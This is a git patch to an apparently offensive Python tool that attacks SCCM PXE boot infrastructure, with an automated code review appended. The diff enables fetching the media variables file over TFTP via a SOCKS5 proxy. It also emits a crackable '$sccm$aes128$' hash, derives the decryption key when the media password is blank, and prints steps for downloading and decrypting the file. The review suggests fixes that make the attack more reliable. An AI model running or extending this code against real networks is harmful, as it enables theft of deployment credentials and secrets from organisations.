From a57ae8c7c8a2113c3380703346a95133f88141a2 Mon Sep 17 00:00:00 2001
From: Adam Chester
Date: Wed, 4 Sep 2024 23:54:10 +0100
Subject: [PATCH] Updated and added README
---
 main.py | 30 ++++++++++++++----------------
 1 file changed, 14 insertions(+), 16 deletions(-)
diff --git a/main.py b/main.py
index a6741e1..fcaf7d9 100644
--- a/main.py
+++ b/main.py
@@ -21,32 +21,30 @@ sccm_client = sccm.SCCM(args.target, 4011, client)
 (variables,bcd,cryptokey) = sccm_client.send_bootp_request(args.src_ip, "11:22:33:44:55:66")
+print(f"[*] Variables file: {variables}")
+print(f"[*] BCD file: {bcd}")
+
 client.close()
 # TFTP Limitation over SOCKS5 means we can only grab the first few bytes (we can't ack the request):()
 client = socks.SOCKS5Client(args.socks_host, args.socks_port)
 client.connect()
-# tftp_client = tftp.TFTPClient(args.target, 69, client)
-
-# data_a = tftp_client.get_file(variables)
-# data_b = tftp_client.get_file(bcd)
+tftp_client = tftp.TFTPClient(args.target, 69, client)
+data_variables = tftp_client.get_file(variables)
 if cryptokey == None:
- hashcat_hash = f"$sccm$aes128${sccm_client.read_media_variable_file_header(data_a).hex()}"
+ hashcat_hash = f"$sccm$aes128${sccm_client.read_media_variable_file_header(data_variables).hex()}"
 print(hashcat_hash)
- print("Try cracking this hash to read the media file")
+ print("[*] Try cracking this hash to read the media file")
 else:
- print("Blank password on PXE media file found!")
- print("Attempting to decrypt it...")
+ print("[*] Blank password on PXE media file found!")
+ print("[*] Attempting to decrypt it...")
 decrypt_password = sccm_client.derive_blank_decryption_key(cryptokey)
 if( decrypt_password ):
- print("Password retrieved: " + decrypt_password.hex())
+ print("[*] Password retrieved: " + decrypt_password.hex())
- #media_variables = sccm_client.decrypt_media_file(data_a, decrypt_password)
- #if( media_variables ):
- # sccm_client.process_pxe_media_xml(media_variables)
-
-# client.send(example_dns_a_request, ("192.168.130.12", 4011))
-# data = client.recv(1024)
-# print(data)
\ No newline at end of file
+print("[*] Once you have the key, download the variables file from:")
+print(f"[*] \\\\{args.target}\\REMINST{variables}")
+print("[*] You can then decrypt this with PXEThiefy.py using:")
+print("[*] python3 pxethiefy.py decrypt -p PASSWORD -f ")
\ No newline at end of file
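Review bot: `data_variables = tftp_client.get_file(variables)` is handed straight to `read_media_variable_file_header(...)` with no check on what came back, although the comment above the reconnect says the SOCKS5 path only yields the first bytes of the file. A failed or short transfer would then either raise inside the helper or print a truncated `$sccm$aes128$` string that looks valid. A guard ahead of the `if cryptokey == None:` branch, such as `if not data_variables: raise SystemExit("[!] TFTP read of the variables file returned no data")`, would make that failure explicit; the minimum length the header reader needs is not visible here and should be confirmed against the `sccm` module. The second `client` opened for TFTP is also never closed on the new side, so a `client.close()` after `get_file` would match how the first connection is handled. The script's top-level code starts above this hunk, so imports and argument parsing were not reviewed.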